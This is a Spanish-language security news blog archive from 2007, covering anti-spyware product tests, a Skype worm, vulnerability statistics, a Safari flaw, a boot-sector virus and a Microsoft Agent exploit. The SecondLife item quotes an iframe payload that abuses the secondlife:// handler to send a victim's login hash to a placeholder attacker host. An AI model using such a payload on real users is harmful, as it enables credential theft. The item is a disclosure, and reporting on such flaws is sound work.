Archivos para septiembre 18, 2007

¿Cree que el programa gratuito Windows Defender de Microsoft le salvará de los ataques? En las pruebas que realizamos no pudo cumplir su cometido. Sometimos este programa y otras cinco herramientas de contraespionaje a rigurosas pruebas de laboratorio para encontrar la mejor herramienta para su PC.

En sus comienzos, el software antivirus combatía los virus y gusanos, y el de contraespionaje combatía los programas espías y publicitarios. Esa clara distinción ha desaparecido en gran parte. La decadencia del macro virus y del gusano del correo electrónico forzó a las compañías antivirus a buscar otra presa, y la complejidad de los programas espías los hace un enemigo formidable.

Varios de ellos son eficaces para combatir los caballos de Troya y los llamados programas “de puerta trasera” (que se instalan furtivamente en un sistema y suelen ser clasificados como programas espías), además de los programas publicitarios. Entonces se nos ocurre preguntar: ¿son las herramientas de contraespionaje especializadas particularmente eficaces para combatir las amenazas de hoy?
Para averiguarlo, examinamos seis programas bien conocidos. Probamos cinco de ellos –AVG Anti-Spyware 7.5 de Grisoft, Windows Defender 1.1 de Microsoft, Spyware Doctor 5.0 de PC Tools, Spybot Search & Destroy 1.4 de Safer Networking y Spy Sweeper 5.5 de Webroot– en sistemas que utilizan la plataforma Windows Vista. El sexto programa, Ad-Aware 2007 Plus de Lavasoft, no estaba disponible en una versión para Vista cuando realizamos nuestras pruebas, así que lo evaluamos en una PC con Windows XP SP2; es por eso que sus resultados no son directamente comparables con los de las otras aplicaciones.

La compañía alemana de investigaciones AV-Test.org condujo la porción de programas maliciosos de nuestras pruebas, bombardeando las aplicaciones con muestras de programas publicitarios y de espionaje actuales. AV-Test.org midió la capacidad de los productos para reconocer unos 110.000 programas publicitarios, programas espías y rootkits inactivos. Una muestra inactiva es como una aplicación que usted ha bajado y no ha instalado aún. Usted querrá que su producto de contraespionaje la reconozca –partiendo de una base de datos de peligros conocidos– antes de que la muestra se instale y se active en diversas áreas de su PC. Para ver cómo las herramientas reaccionarían en tales casos, AV-Test también midió la capacidad de cada producto para reconocer el comportamiento y limpiar 20 programas publicitarios y de espionaje activos. Como cada amenaza se puede dividir en más de 100 componentes, la desinfección puede ser laboriosa. Esperábamos que los programas limpiaran los cambios importantes hechos en el Registro y en archivos. También nos fijamos en la capacidad de los programas para detectar y bloquear cambios en áreas importantes de un sistema infectado basándose en el comportamiento, sin tener que reconocer nada acerca de un invasor específico. Los escritores de programas espías continuamente idean nuevas amenazas y las compañías de seguridad generalmente se demoran en actualizar sus programas para detectar esas amenazas. Un producto de contraespionaje cuyo método de detección se basa en el comportamiento protege al usuario durante este período crítico. También probamos los falsos positivos y la velocidad, y evaluamos el diseño, el precio y la facilidad de uso de cada software.
Los resultados: Spyware Doctor 5.0 de PC Tools superó a sus competidores para la plataforma Vista. El AVG Anti-Spyware 7.5 de Grisoft y Spy Sweeper 5.5 de Webroot terminaron muy detrás. Ni Spybot Search & Destroy ni Windows Defender le protegen adecuadamente contra las amenazas actuales. Y en Windows XP, el Ad-Aware de Lavasoft no nos impresionó en varias áreas de desempeño.

 

El gusano WORM_SKIPI.A aprovecha el chat de Skype para enviar mensajes a los usuarios registrados en la lista de contactos incluyendo un enlace que descarga una copia de esta misma amenaza.

Diario Ti: Una vez descargada en la máquina infectada, esta amenaza modifica el estado del usuario Skype de “Conectado” a “Ocupado” o “Invisible” e impide que dicha aplicación sea abierta. Asimismo, evita que varias herramientas anti-virus se actualicen desde Internet, infectando el sistema con direcciones falsas hacia distintos sitios de fabricantes de seguridad.

La mayoría de los reportes de infección de WORM_SKIPI.A provienen de los Estados Unidos y Asia (particularmente Taiwán). En Latinoamérica se han reportado muy pocos incidentes del mismo.

Trend Micro detecta esta amenaza en todos sus productos desde el lanzamiento de su patrón de virus número 4.709, liberado el pasado lunes 10 de Septiembre por la noche y previene el acceso a los sitios de descarga del gusano a través de sus servicios reputación por Internet.

Trend Micro recomienda a las empresas implementar políticas de seguridad para prevenir que los usuarios puedan descargar y ejecutar esta amenaza de Internet.

Trend Micro alerta a todos los usuarios de Skype a estar atentos ante cualquier invitación de cualquier usuario (especialmente de los desconocidos) de hacer clic en alguna liga. Adicionalmente, considera que debido al gran número de usuarios de Skype, que ronda cerca de los 220 millones, esta amenaza puede prevalecer y propagarse con mucha rapidez.

Vulnerabilidades 2007: Top 10

Publicado: septiembre 18, 2007 en Articulos, Vulnerabilidades

IBM ha publicado su informe sobre las vulnerabilidades publicadas en el primer semestre de 2007, que revela que 5 fabricantes son los responsables del 12.6 % de ellas.

Según IBM, el “Top 10″ de las vulnerabilidades es el siguiente:

Vía Report: MS, Apple, Oracle Are Top Vulnerable Vendors [eWeek].

Apenas unas cuantas horas después de que Apple lanzó su primer versión para Windows de Safari, el investigador Aviv Raff había encontrado una falla.

Apple se está convirtiendo en el blanco de las firmas de seguridad estos días. En abril, hubo un concurso para hackear una Mac con un premio de US$10.000, el CanSecWest y el lunes fue el navegador Web Safari. O el beta público Safari para Windows, lo que sea.

Tan solo horas después de que Apple lanzó su primer beta para Windows de Safari, el investigador Aviv Raff dijo que había encontrado una falla.
En una entrevista, Raff dijo que le tomó tres minutos de trabajo para encontrar la falla y que no había probado el problema en Mac OS X. Así que no podría decir si o no afectó solo el Safari para Windows. La falla causa que el navegador se caiga y “sería explotable”, de acuerdo con Raff, significa que sería usado posiblemente para correr malware en la PC.

Raff estaba claramente molesto con la afirmación de Apple de que Safari fue diseñado para ser “seguro desde el primer día” (llamó a esta afirmación “patética”) pero no estaba yendo particularmente contra Apple. “No solo me refiero a Apple”, dijo. “También he reseñado asuntos sobre Microsoft y Mozilla”.
“Todos tienen fallas, pero nadie dice que están “diseñados para ser seguros desde el primer día”, agregó. “Supongo que el día cero es ahora”.

-Por Robert McMillan
IDG News Service

Me ha llamado poderosamente la atencion esta noticia que podemos leer originalmente en Softpedia que vuelve a dejar a las claras una vez mas que Windows Live OneCare Live 1.6 hace aguas por todos lados.

La historia es la siguiente:

Medion vendio una partida de ordenadores portatiles que llevaban en el arranque del disco duro el virus Stoned.Angelina que data de 1994.

El problema viene de “soluciones antivirus” como Windows Live OneCare Live 1.6 que no escanea en el boot de arranque del disco duro ( imperdonable ) y por tanto no detecta ni ese ni ningun virus que este en el boot del disco duro ( sic )

Pero no acaba aqui la historia: tan solo G Data (AVK) Total Care 2008; BitDefender Internet Security 2008 (v10) y Kaspersky Internet Security 7.0 ( los que son para mi los 3 mejores antivirus pero no por ese orden ) fueron capaces de detectar el virus y eliminarlo sin problemas, mientras que Symantec Norton 360 y Panda Internet Security 2008 (v12) detectaron tambien y eliminaron el virus pero dejaron el sector de arranque del disco duro inservible y por tanto el sistema no arrancaba.

BullGuard Internet Security 7.0; McAfee Internet Security 2007; McAfee Internet Security 2007 y Avira AntiVir Personal Premium (v7) encontraron el virus pero fueron incapaces de eliminarlo.

Sacad vuestras propias conclusiones pero esta claro una vez mas que en cuestion de antivirus hay 3 opciones que realmente en mi humilde opinion merezcan ese nombre.

GNU Citizen acaba de hacer público un nuevo uso para el ya conocido “bug compartido”, del que Microsoft se lava las manos y asegura no tener nada que ver. En fin, mediante lo publicado por GNU Citizen un atacante puede hacerse con los datos de un usuario de SecondLife sin necesitad de una gran interacción, solo hace falta visitar una web con cierto código utilizando para ello Internet Explorer.

Mediante una llamada a secondlife:// el atacante puede ejecutar el cliente de SecondLife iniciando sesión automáticamente (-autologin) contra la URL especificada por el victimario (-loginuri), de esta forma mediante una llamada XML-RPC uno puede obtener el hash MD5 de la clave del usuario.

<iframe src=’secondlife://” -autologin -loginuri “http://atacante.com/sl/record-login.php’></iframe&gt;

El hash MD5 puede ser utilizado para conectarse a SL con la sesión robada o bien obtener su valor haciendo uso de las rainbow tables.

Enlaces relacionados:

http://www.gnucitizen.org/blog/ie-pwns-secondlife

# Martín Aberastegue
# Rynho Zeros Web (http://www.rzw.com.ar)
# Seguridad Informática

Se ha reportado un exploit para la vulnerabilidad en Microsoft Agent que fuera corregida en unos de los últimos boletines de la compañía. Un ataque exitoso puede permitir a un intruso tomar el control total del sistema.

La vulnerabilidad, catalogada como crítica, afecta a Windows 2000, y puede ser explotada mediante un enlace malicioso.

Microsoft Agent es la tecnología que permite interactuar con el usuario. Un ejemplo son los personajes animados de la búsqueda de Windows o la ayuda de aplicaciones como Office.

Se recomienda a los usuarios que utilizan las versiones vulnerables de Windows, actualizarse a la brevedad posible.

Más información:

MS07-051 Vulnerabilidad en Microsoft Agent (938827)

http://www.vsantivirus.com/vulms07-051.htm

(c) Video Soft – http://www.videosoft.net.uy
(c) VSAntivirus – http://www.vsantivirus.com